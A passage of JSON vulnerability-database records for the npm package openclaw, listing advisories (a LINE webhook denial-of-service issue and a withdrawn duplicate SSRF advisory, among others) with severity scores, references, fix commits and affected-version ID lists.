reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42431","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11193","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42431"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42431","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42431"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass"},{"reference_url":"https://github.com/advisories/GHSA-cmfr-9m2r-xwhq","reference_id":"GHSA-cmfr-9m2r-xwhq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cmfr-9m2r-xwhq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42431","GHSA-cmfr-9m2r-xwhq"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ma62-gtan-97au"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90122?format=json","vulnerability_id":"VCID-mcz5-wgu1-z7g7","summary":"OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n## Summary\nLINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41343","reference_id":"","reference_type":"","scores":[{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35317","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35292","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35328","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41343"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41343","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41343"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency"},{"reference_url":"https://github.com/advisories/GHSA-qcc3-jqwp-5vh2","reference_id":"GHSA-qcc3-jqwp-5vh2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcc3-jqwp-5vh2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41343","GHSA-qcc3-jqwp-5vh2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mcz5-wgu1-z7g7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89346?format=json","vulnerability_id":"VCID-mggy-bv5s-5uax","summary":"Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"},{"reference_url":"https://github.com/advisories/GHSA-8j7f-g9gv-7jhc","reference_id":"GHSA-8j7f-g9gv-7jhc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8j7f-g9gv-7jhc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-